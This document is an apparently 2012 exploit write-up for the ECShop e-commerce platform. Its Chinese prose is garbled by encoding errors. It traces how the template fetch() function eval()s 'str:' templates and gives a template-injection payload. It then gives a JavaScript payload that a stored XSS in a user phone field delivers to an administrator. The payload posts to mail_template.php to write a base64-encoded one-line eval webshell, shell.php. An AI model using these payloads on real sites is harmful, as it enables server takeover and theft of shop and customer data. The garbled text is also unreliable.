ecshopº̨0day©ԭ+÷ XSS+Getshll

ڣ2012-10.25
 
ߣdis9@ztz
 
©ͣվ ִ
 
00 ̨getshell
  includes/cls_template.php fetch
 1./**
 2.* ģļ
 3.*
 4.* @access public
 5.* @param string $filename
 6.* @param sting $cache_id
 7.*
 8.* @return sring
 9.*/
 10.function fetch($filename, $cache_id = )
 11.{
 12.if (!$this->_seterror)
 13.{
 14.error_reporting(E_ALL ^ E_NOTICE);
 15.}
 16.$this->_seterror++;
 17.//$filenamestr:ͷִwww.yunsec.net
 18.if (strncmp($filename,str:, 4) == 0)
 19.{
 20.$out = $this->_eval($this->fetch_str(substr($filename, 4)));
 21.}
 22.   
 23.Կ$filenameԡstr:ͷô͵_eval()ִСstr:Ĵ,ִ֮ǰϵͳfetch_strַҺ滻
 24._eval():
 25.function _eval($content)
 26.{
 27.ob_start();
 28.eval(? . > . trim($content));
 29.$content = ob_get_contents();
 30.ob_end_clean();
 31.return $content;
 32.}
 33.eval()ִ$contentˣfetch_str()
 34./**
 35.* ַ
 36.*
 37.* @access public
 38.* @param string $source
 39.*
 40.* @return string
 41.*/
 42.function fetch_str($source)
 43.{
 44.if (!defined(ECS_ADMIN))
 45.{
 46.$source = $this->smarty_prefilter_preCompile($source);
 47.}
 48.$source = preg_replace(/<\?[^><]+\?>|<\%[^><]+\%>|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*<\/script\s*>/iU, , $source);
 49.return preg_replace(/{([^\}\{\n]*)}/e, \$this->select(\\1);, $source);
 50.}
 51.phpԵıǡ
 52.Ҫ鿴Щҵδ룺wholesale.php
 53./* */
 54.//C ύ
 55./* */
 56.elseif ($_REQUEST['act'] == submit_order)
 57.{
 58.include_once(ROOT_PATH . includes/lib_order.php);
 59.            
 60.            
 61./* ̼ҷʼ */
 62.if ($_CFG['service_email'] != )
 63.{
 64.$tpl = get_mail_template(remind_of_new_order);
 65.           
 66.           
 67.$content = $smarty->fetch(str: . $tpl['template_content']);
 68.           
 69.}
 
ύĵط˴get_mail_template()remind_of_new_orderģݣȻ뵽fetchִУԿremind_of_new_orderģǾͿecshopִǵˡ
 ں̨ģҵʼģ壬remind_of_new_orderΪ{$phpinfo()];phpinfo();/*}ȻڵпԿ뱻滻ˡ<?php echo $this->_var['phpinfo()'];phpinfo();/*]; ?>
 ɹִС
 


01 ǰ̨xss
 ǰ̨Щط˲֣ûԹjavascriptɶԺ̨Աxss
 עûԺջϢ绰һֻбصĿͻ˼飬ûк˹ˣеxss
 


02 xss+̨getshell
 ûcsrfķ˿ǰ̨xss̨ùԱgetshell
 ʵgetshelljs
 


Var Shelldata=subject=%C3%DC%C2%EB%D5%D2%BB%D8&mail_type=0&tpl=1&content=%7B%24user_name%27%5D%3Bfile_put_contents%28base64_decode%28%27c2hlbGwucGhw%27%29%2Cbase64_decode%28%27PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4%3D%27%29%29%3Becho+%24var%5B%27%24user_name%7D%0D%0A%3C%2Fp%3E%0D%0A%3Cp%3E%7B%24user_name%7D%C4%FA%BA%C3%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%C4%FA%D2%D1%BE%AD%BD%F8%D0%D0%C1%CB%C3%DC%C2%EB%D6%D8%D6%C3%B5%C4%B2%D9%D7%F7%A3%AC%C7%EB%B5%E3%BB%F7%D2%D4%CF%C2%C1%B4%BD%D3%28%BB%F2%D5%DF%B8%B4%D6%C6%B5%BD%C4%FA%B5%C4%E4%AF%C0%C0%C6%F7%29%3A%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%3Ca+target%3D%22_blank%22+href%3D%22%7B%24reset_email%7D%22%3E%7B%24reset_email%7D%3C%2Fa%3E%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%D2%D4%C8%B7%C8%CF%C4%FA%B5%C4%D0%C2%C3%DC%C2%EB%D6%D8%D6%C3%B2%D9%D7%F7%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%7B%24shop_name%7D%3Cbr+%2F%3E%0D%0A%7B%24send_date%7D%3C%2Fp%3E; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject(Microsoft.XMLHTTP)); xml.open(POST,/ecshop/upload/admin/mail_template.php?act=save_template,false); xml.setRequestHeader(Content-Type, application/x-www-form-urlencoded); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){} 


 
 
ϴjsͼƬûֱӴⲿվöԡΪ˲Է㣬ӱ
 


ύԱʸöûһ룬ͻڸĿ¼shell.php207.
 
Աʶǰһģ壺
 


Ա鿴
 


鿴֮ʼģ
 


ûǰ̨һ룬Ŀ¼һ仰shell.php
 